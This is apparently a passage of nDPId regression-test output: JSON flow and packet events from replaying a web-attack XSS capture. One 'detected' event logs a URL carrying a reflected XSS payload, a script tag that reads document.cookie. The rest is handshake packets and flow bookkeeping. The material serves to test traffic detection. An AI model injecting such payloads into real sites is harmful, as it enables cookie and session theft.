+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Nl1AAD4Gj3OsEAABwKgKMt6+AFBNkZW3AAAAAKACchD3hwAAAgQFtAQCCAoBOqPqAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1499347422332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3r7LRREdTZGVuKAScSCivwAAAgQFtAQCCAoD5HVgATqj6gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3788,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1499347422333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347422333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nl5AAD4Gj3qsEAABwKgKMt6+AFBNkZW4y0URHoAQAOVBxgAAAQEICgE6o+sD5HVg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347423604,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347423604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347228091,"flow_last_seen":1499347294990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232370,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347426122,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347426122,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vtlAAD4GBvesEAABwKgKMt7mAFDtahlHAAAAAKACchDQQgAAAgQFtAQCCAoBOqeeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347426122,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ub5Z5wJ7WoZSKAScSC+twAAAgQFtAQCCAoD5HkUATqnngEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3822,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1499347426122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347426122,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vtpAAD4GBv6sEAABwKgKMt7mAFDtahlI+WecCoAQAOVdvwAAAQEICgE6p54D5HkU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347427366,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347427366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UGVAAD4GdWusEAABwKgKMt70AFC9kfiwAAAAAKACchAfbQAAAgQFtAQCCAoBOqjVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":1499347427366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347427366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3vS8sHHovZH4saAScSBzgwAAAgQFtAQCCAoD5HpLATqo1QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1499347427367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347427367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UGZAAD4GdXKsEAABwKgKMt70AFC9kfixvLBx6YAQAOUSiwAAAQEICgE6qNUD5HpL"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347428671,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347428671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vFFAAD4GCX+sEAABwKgKMt8CAFCqwBZKAAAAAKACchATUQAAAgQFtAQCCAoBOqobAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1499347428671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347428671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3wITPWXXqsAWS6AScSAbpgAAAgQFtAQCCAoD5HuRATqqGwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1499347428672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347428672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vFJAAD4GCYasEAABwKgKMt8CAFCqwBZLEz1l2IAQAOW6rQAAAQEICgE6qhsD5HuR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347431192,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347431192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3862,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+sNAAD4GywysEAABwKgKMt8cAFA\/1VZRAAAAAKACchA7pAAAAgQFtAQCCAoBOqySAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3863,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1499347431192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347431192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3xwMzQFkP9VWUqAScSCsZgAAAgQFtAQCCAoD5H4HATqskgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1499347431193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347431193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+sRAAD4GyxOsEAABwKgKMt8cAFA\/1VZSDM0BZYAQAOVLbgAAAQEICgE6rJID5H4H"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347432482,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347432482,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rn5AAD4GF1KsEAABwKgKMt8qAFCuFwOqAAAAAKACchAeuQAAAgQFtAQCCAoBOq3UAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347432482,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ypOGaUvrhcDq6AScSCpIAAAAgQFtAQCCAoD5H9KATqt1AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":1499347432482,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347432482,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rn9AAD4GF1msEAABwKgKMt8qAFCuFwOrThmlMIAQAOVIKAAAAQEICgE6rdQD5H9K"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347433753,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347433753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3889,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JW1AAD4GoGOsEAABwKgKMt84AFAetop\/AAAAAKACchAl+QAAAgQFtAQCCAoBOq8SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3890,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1499347433753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347433753,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3zgqPCDhHraKgKAScSBXTwAAAgQFtAQCCAoD5ICHATqvEgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":1499347433754,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347433754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JW5AAD4GoGqsEAABwKgKMt84AFAetoqAKjwg4oAQAOX2VgAAAQEICgE6rxID5ICH"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 